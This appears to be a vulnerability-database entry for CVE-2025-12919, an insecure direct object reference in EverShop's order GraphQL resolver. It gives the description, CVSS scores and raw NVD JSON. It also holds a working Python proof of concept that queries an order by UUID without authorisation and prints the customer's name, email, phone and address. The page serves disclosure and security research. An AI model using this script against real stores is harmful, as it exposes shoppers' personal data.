Security Vulnerability Report
中文
CVE-2025-12919 CVSS 3.7 LOW

CVE-2025-12919

Published: 2025-11-09 20:15:35
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was detected in EverShop up to 2.0.1. Affected is an unknown function of the file /src/modules/oms/graphql/types/Order/Order.resolvers.js of the component Order Handler. The manipulation of the argument uuid results in improper control of resource identifiers. The attack may be performed from remote. This attack is characterized by high complexity. The exploitability is told to be difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:evershop:evershop:*:*:*:*:*:node.js:*:* - VULNERABLE
EverShop <= 2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12919 EverShop Order Information Disclosure PoC # Target: EverShop <= 2.0.1 # Vulnerability: IDOR in Order Handler GraphQL resolver # Affected File: /src/modules/oms/graphql/types/Order/Order.resolvers.js import requests import sys def exploit_order_leak(target_url, order_uuid): """ Exploit the IDOR vulnerability to leak order information """ graphql_endpoint = f"{target_url}/api/graphql" query = f""" query {{ order(uuid: "{order_uuid}") {{ id orderNumber customer {{ firstName lastName email telephone }} items {{ productId productName quantity price }} shippingAddress {{ address1 address2 city country postalCode }} paymentMethod total status }} }} """ headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } payload = {'query': query} try: response = requests.post(graphql_endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() if 'data' in data and 'order' in data['data']: order = data['data']['order'] if order: print(f"[+] Successfully leaked order information:") print(f" Order UUID: {order_uuid}") print(f" Order Number: {order.get('orderNumber')}") print(f" Customer: {order.get('customer', {}).get('firstName')} {order.get('customer', {}).get('lastName')}") print(f" Email: {order.get('customer', {}).get('email')}") return True print("[-] Failed to retrieve order information") return False except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <order_uuid>") print(f"Example: python {sys.argv[0]} http://vulnerable-shop.com 550e8400-e29b-41d4-a716-446655440000") sys.exit(1) target = sys.argv[1] uuid = sys.argv[2] exploit_order_leak(target, uuid)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12919", "sourceIdentifier": "[email protected]", "published": "2025-11-09T20:15:34.683", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in EverShop up to 2.0.1. Affected is an unknown function of the file /src/modules/oms/graphql/types/Order/Order.resolvers.js of the component Order Handler. The manipulation of the argument uuid results in improper control of resource identifiers. The attack may be performed from remote. This attack is characterized by high complexity. The exploitability is told to be difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-99"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:evershop:evershop:*:*:*:*:*:node.js:*:*", "versionEndIncluding": "2.0.1", "matchCriteriaId": "CA8DEE2D-3D6E-4157-B471-AF50D7AA6433"}]}]}], "references": [{"url": "https://github.com/ictrun/Evershop-Order-leak/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/ictrun/Evershop-Order-leak/blob/main/README.md#attack-steps", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.331639", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.331639", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.680788", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/ictrun/Evershop-Order-leak/blob/main/README.md#attack-steps", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.